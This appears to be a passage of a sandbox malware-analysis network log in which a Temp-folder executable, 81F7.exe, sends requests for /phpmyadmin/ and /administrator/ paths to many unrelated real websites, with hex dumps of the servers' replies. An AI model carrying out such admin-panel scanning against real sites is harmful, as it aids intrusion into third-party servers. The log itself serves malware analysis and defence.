2024-02-20 23:26:05 UTC	8192	IN	Data Raw: 32 30 36 66 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 66 74 74 65 63 68 6e 6f 6c 6f 67 69 65 73 2e 63 6f 6d 2f 73 65 72 76 69 63 65 2f 75 73 65 72 2d 65 78 70 65 72 69 65 6e 63 65 64 65 73 69 67 6e 2f 22 20 63 6c 61 73 73 3d 22 6c 69 73 74 48 65 61 64 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 55 73 65 72 20 45 78 70 65 72 69 65 6e 63 65 20 44 65 73 69 67 6e 22 3e 55 73 65 72 20 45 78 70 65 72 69 65 6e 63 65 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 73 69 67 6e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 206fhttps://wefttechnologies.com/service/user-experiencedesign/" class="listHead" aria-label="User Experience Design">User Experience Design</a> <ul>
2024-02-20 23:26:05 UTC	117	IN	Data Raw: 69 6c 6c 69 61 6e 63 65 20 74 6f 67 65 74 68 65 72 21 3c 2f 68 34 3e 2d 2d 3e 0a 09 09 09 09 09 09 09 09 3c 21 2d 2d 3c 2f 64 69 76 3e 2d 2d 3e 0a 09 09 09 09 09 09 09 09 3c 21 2d 2d 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 35 20 6d 74 2d 61 75 74 6f 22 3e 2d 2d 3e 0a 09 09 09 09 09 09 09 09 3c 21 2d 2d 09 3c 61 20 68 72 65 66 3d 22 Data Ascii: illiance together!</h4>-->...</div>-->...<div class="col-lg-5 mt-auto">-->...<a href="
2024-02-20 23:26:05 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:06 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 66 74 74 65 63 68 6e 6f 6c 6f 67 69 65 73 2e 63 6f 6d 2f 63 6f 6e 74 61 63 74 22 20 63 6c 61 73 73 3d 22 6e 61 76 42 74 6d 42 74 6e 22 3e 3c 73 70 61 6e 3e 4c 65 74 e2 80 99 73 20 54 61 6c 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 2d 2d 3e 0a 09 09 09 09 09 09 09 09 3c 21 2d 2d 3c 2f 64 69 76 3e 2d 2d 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 20 75 6c 2d 6d 6f 62 2d 76 69 65 77 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 73 6f 63 69 61 6c 55 6c 22 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 09 09 09 Data Ascii: 4000https://wefttechnologies.com/contact" class="navBtmBtn"><span>Lets Talk</span></a>-->...</div>--><div class="col-12 ul-mob-view"><ul class="socialUl"><li><a href="#" aria-label="logo">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	51938	109.71.40.107	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	340	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:05 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache
2024-02-20 23:26:05 UTC	1344	IN	Data Raw: 35 33 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a Data Ascii: 534<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	52268	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_b/+ZzoFwhSSD9q4PpaobwB+0g8tnkRjvv2QneVHuqTijgIpjZadVnbEgzUMmoQPredb/K2q80PScyxmdFrJJJw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	51885	81.169.145.86	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:10 UTC	7672	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
2024-02-20 23:26:10 UTC	526	IN	Data Raw: 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 68 6f 76 65 72 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d Data Ascii: e="radio"]:checked,input[type=reset],input[type="checkbox"]:checked,input[type="checkbox"]:hover:checked,input[type="checkbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:var(--ast-global-color-0);background-color:var(--ast-global-
2024-02-20 23:26:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:10 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 6e 6f 74 28 2e 61 73 74 2d 62 75 74 74 6f 6e 29 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: 2000try-meta,.entry-meta {line-height:1.45;color:var(--ast-global-color-0);}.entry-meta a:not(.ast-button):hover,.entry-meta a:not(.ast-button):hover ,.entry-meta a:not(.ast-button):focus,.entry-meta a:not(.ast-button):focus *,.page-links > .page-link
2024-02-20 23:26:10 UTC	6	IN	Data Raw: 6c 69 6e 6b 2e 77 Data Ascii: link.w
2024-02-20 23:26:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:10 UTC	6250	IN	Data Raw: 31 38 36 32 0d 0a 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 6f 75 74 6c 69 6e 65 2d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 Data Ascii: 1862p-element-button,.ast-outline-button{border-color:#000000;font-family:inherit;font-weight:inherit;line-height:1em;border-top-left-radius:30px;border-top-right-radius:30px;border-bottom-right-radius:30px;border-bottom-left-radius:30px;}.wp-block-butt
2024-02-20 23:26:10 UTC	8192	IN	Data Raw: 37 39 65 0d 0a 6e 3a 66 6f 63 75 73 2c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 23 73 75 62 6d 69 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 23 73 75 62 6d 69 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 62 75 Data Ascii: 79en:focus,.menu-toggle:hover,button:hover,.ast-button:hover,.ast-custom-button:hover .button:hover,.ast-custom-button:hover ,input[type=reset]:hover,input[type=reset]:focus,input#submit:hover,input#submit:focus,input[type="button"]:hover,input[type="bu
2024-02-20 23:26:10 UTC	501	IN	Data Raw: 6f 67 69 6e 6f 75 74 20 70 20 6c 61 62 65 6c 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 70 3a 6e 6f 74 28 2e 6c 6f 67 69 6e 2d 72 65 6d 65 6d 62 65 72 29 3a 6e 6f 74 28 2e 6c 6f 67 69 6e 2d 73 75 62 6d 69 74 29 20 69 6e 70 75 74 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 6f 67 69 6e 6f 75 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 6f 75 74 6c 69 6e 65 3a 20 74 68 69 6e 20 64 6f 74 74 65 64 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 Data Ascii: oginout p label {display: block;}.wp-block-loginout p:not(.login-remember):not(.login-submit) input {width: 100%;}.wp-block-loginout input:focus {border-color: transparent;}.wp-block-loginout input:focus {outline: thin dotted;}.entry-content .wp-block-med
2024-02-20 23:26:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	51818	59.106.13.100	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	150	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
2024-02-20 23:26:05 UTC	16234	IN	Data Raw: 35 62 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 5bbb<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="ja"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content=
2024-02-20 23:26:06 UTC	7262	IN	Data Raw: 4c 51 44 4b 52 74 34 78 63 6d 64 4a 51 6b 42 41 66 51 47 55 55 33 71 71 2b 64 52 66 71 30 33 73 48 4e 44 71 6a 30 51 6b 50 68 38 2b 6a 6f 53 45 6f 51 55 4a 67 4c 30 67 31 58 37 6a 55 6f 6b 47 59 5a 30 4f 55 5a 57 31 51 42 64 76 6b 2b 0a 46 49 42 56 4c 57 77 57 70 4b 77 45 6d 63 33 54 48 75 73 72 4a 55 75 52 65 59 54 69 30 4e 6e 73 72 49 75 31 54 42 4d 54 34 36 55 73 36 4c 79 6a 71 36 76 72 79 49 4f 56 30 39 4a 53 64 75 7a 59 71 76 66 70 59 32 4e 6a 46 79 2f 2b 74 72 53 30 0a 53 4d 34 4b 63 4e 33 36 2b 76 72 42 73 64 4d 51 57 4a 46 62 53 66 76 33 37 31 48 61 69 51 6a 73 65 4f 7a 59 32 33 2f 35 79 79 6c 62 4f 55 32 35 77 77 6f 73 43 46 78 34 34 73 52 37 47 76 66 4d 77 64 77 49 6a 77 67 62 48 36 4e 77 35 2b 44 67 0a 6f 4d 6c 6b 43 67 30 4e 4e 54 59 30 33 64 Data Ascii: LQDKRt4xcmdJQkBAfQGUU3qq+dRfq03sHNDqj0QkPh8+joSEoQUJgL0g1X7jUokGYZ0OUZW1QBdvk+FIBVLWwWpKwEmc3THusrJUuReYTi0NnsrIu1TBMT46Us6Lyjq6vryIOV09JSduzYqvfpY2NjFy/+trS0SM4KcN36+vrBsdMQWJFbSfv371HaiQjseOzY23/5yylbOU25wwosCFx44sR7GvfMwdwIjwgbH6Nw5+DgoMlkCg0NNTY03d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	52186	223.29.45.22	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Content-Length: 209 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	209	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	52341	221.121.158.21	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	340	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:06 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache
2024-02-20 23:26:06 UTC	1381	IN	Data Raw: 35 35 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a Data Ascii: 559<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	51865	15.161.71.77	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	444	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpmyadmin/ Content-Length: 250 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	250	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 